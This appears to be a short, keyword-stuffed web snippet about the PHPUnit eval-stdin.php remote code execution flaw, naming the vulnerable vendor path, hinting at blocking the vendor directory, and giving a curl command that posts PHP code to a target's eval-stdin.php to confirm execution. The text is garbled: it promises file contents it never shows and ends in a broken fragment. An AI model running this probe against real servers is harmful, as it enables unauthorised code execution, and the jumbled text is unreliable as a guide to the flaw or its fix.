Exploit - Vendor Phpunit Phpunit Src Util Php Eval-stdin.php

The vulnerability exists in the file vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php . The contents of the file in vulnerable versions are minimal and look roughly like this:

Add a location block to deny access to the vendor directory. vendor phpunit phpunit src util php eval-stdin.php exploit

curl -s -X POST http://target.com/path/to/eval-stdin.php -d "<?php echo 'test'; ?>" | grep test ?php echo 'test'